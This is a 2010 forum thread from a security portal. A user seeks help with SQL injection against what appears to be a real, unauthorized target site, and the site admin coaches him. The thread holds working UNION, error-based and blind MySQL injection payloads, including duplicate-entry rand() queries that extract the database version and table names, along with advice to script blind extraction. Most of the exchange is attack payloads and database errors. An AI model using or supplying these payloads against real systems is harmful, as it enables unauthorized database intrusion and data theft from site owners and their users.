Waraxe IT Security Portal
Login or Register
December 19, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 98
Members: 0
Total: 98
Full disclosure
Stored XSS with Filter Bypass - blogenginev3.3.8
[SYSS-2024-085]: Broadcom CA Client Automation - Improper Privilege Management (CWE-269)
[KIS-2024-07] GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
RansomLordNG - anti-ransomware exploit tool
APPLE-SA-12-11-2024-9 Safari 18.2
APPLE-SA-12-11-2024-8 visionOS 2.2
APPLE-SA-12-11-2024-7 tvOS 18.2
APPLE-SA-12-11-2024-6 watchOS 11.2
APPLE-SA-12-11-2024-5 macOS Ventura 13.7.2
APPLE-SA-12-11-2024-4 macOS Sonoma 14.7.2
APPLE-SA-12-11-2024-3 macOS Sequoia 15.2
APPLE-SA-12-11-2024-2 iPadOS 17.7.3
APPLE-SA-12-11-2024-1 iOS 18.2 and iPadOS 18.2
SEC Consult SA-20241211-0 :: Reflected Cross-Site Scripting in Numerix License Server Administration System Login
St. Poelten UAS | Multiple Vulnerabilities in ORing IAP
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Help in Sql injection plizz
Post new topicReply to topic View previous topic :: View next topic
Help in Sql injection plizz
PostPosted: Mon Sep 06, 2010 1:48 am Reply with quote
pink_spider
Advanced user
Advanced user
Joined: Aug 28, 2010
Posts: 91




Code:
http://www.site.com/index.php?id=2773+order+by+1,2,3,4,5,6--


it is ook'
but UNION fail ) :

Code:
http://www.site.com/index.php?id=2773 UNION all SELECT 1,2,3,4,5,6--


et erroe is :

Code:

Erro ao executar a SQL!
mysql error: [1222: The used SELECT statements have a different number of columns] in EXECUTE(\"SELECT l.*, lo.*, DATE_FORMAT(l.licitacao_data_abertura,\'%d/%m/%Y\') as licitacao_data_abertura FROM swp_licitacoes l inner join swp_secoes lo on l.secoes_id = lo.secoes_id WHERE l.licitacao_id = 2773 UNION all SELECT version(),version(),version(),version(),version(),version()-- LIMIT 18446744073709551615\")


HELP ME PLIZZ

[/code]
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Sep 06, 2010 11:49 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This situation is common - vulnerable GET/POST parameter is used in multiple sql queries with different column count. So if you get count right for first sql query, then second query will still fail.
My suggestion is error-based sql injection:

Code:

http://www.site.com/index.php?id=2772%2b(IF(LENGTH(version())>1,(SELECT+1+UNION+ALL+SELECT+1),1))


Code:

http://www.site.com/index.php?id=2772%2b(IF(LENGTH(version())>91,(SELECT+1+UNION+ALL+SELECT+1),1))


Some more useful information:

http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Sep 06, 2010 9:59 pm Reply with quote
pink_spider
Advanced user
Advanced user
Joined: Aug 28, 2010
Posts: 91




Very good! thanks

most my problems are not over!
I injected the second code and it worked! I think ¬ ¬

Code:

http://www.site.com//index.php?id=2772%2b(IF(LENGTH(version())>91,(SELECT+1+UNION+ALL+SELECT+1),1))


most do not show up anything on the page!
did not show the version of sql. fuss was indeed null.

how do I fix this problem?
and if not asking too much. I would like to explain the code I posted!

I thank you!

(Y)
[/code]
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Sep 06, 2010 10:13 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Did you get error message as this:

Code:

Subquery returns more than 1 row


It's blind injection, you can retrieve information one bit at the time.
And you need special software for exploitation, because manual way is too error prone and too time consuming.
If you know php, perl, ruby, java or other programming languages, then it's not hard to write needed script or program.
Or try methods from whitepaper, suggested above, it may give you easier ways to exploitation.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Sep 06, 2010 10:16 pm Reply with quote
pink_spider
Advanced user
Advanced user
Joined: Aug 28, 2010
Posts: 91




I can post the website address that contains the vulnerability? or are prohibited by the forum?
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Sep 06, 2010 10:18 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




pink_spider wrote:
I can post the website address that contains the vulnerability? or are prohibited by the forum?

Nope, don't post sensitive information to this forum.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Sep 06, 2010 10:23 pm Reply with quote
pink_spider
Advanced user
Advanced user
Joined: Aug 28, 2010
Posts: 91




ok!
Thanks anyway.

in two columns gives error when using ORDER BY

in column No. 6 and No. 26
I selected and up to 500

what happens then?
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Sep 06, 2010 10:29 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Did you read whitepaper I was suggesting?

http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf

Code:

[ 2 ] ERROR-BASED BLIND SQL INJECTION IN MYSQL
At the turn of the last year, Qwazar has got a universal technique of exploitation of Blind SQL Injection vulnerabilities in applications operating under MySQL database from the depths of forum.antichat.ru (I wonder what else can be found in these depths). It should be mentioned that the proposed technique is rather complicated and opaque. Here is an example of applying this universal approach to MySQL>=5.0:

mysql> select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1
mysql> select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1

If the table name is unknown, which is possible for MySQL < 5.0, then one has to use more complex queries based on the function rand(). It means that we will often fail to obtain the necessary data with one http query.
mysql> select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);
...
1 row in set (0.00 sec)
...
mysql> select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);
ERROR 1062 (23000): Duplicate entry '5.0.84:0' for key 1
Here is an example of practical use of the method for database structure restoration:
http://server/?id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
http://server/?id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--


Analyze that information and do some local tests at your home computer before going online.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Sep 06, 2010 10:37 pm Reply with quote
pink_spider
Advanced user
Advanced user
Joined: Aug 28, 2010
Posts: 91




ook'
thankyou'

Razz
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
Help in Sql injection plizz
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.045 Seconds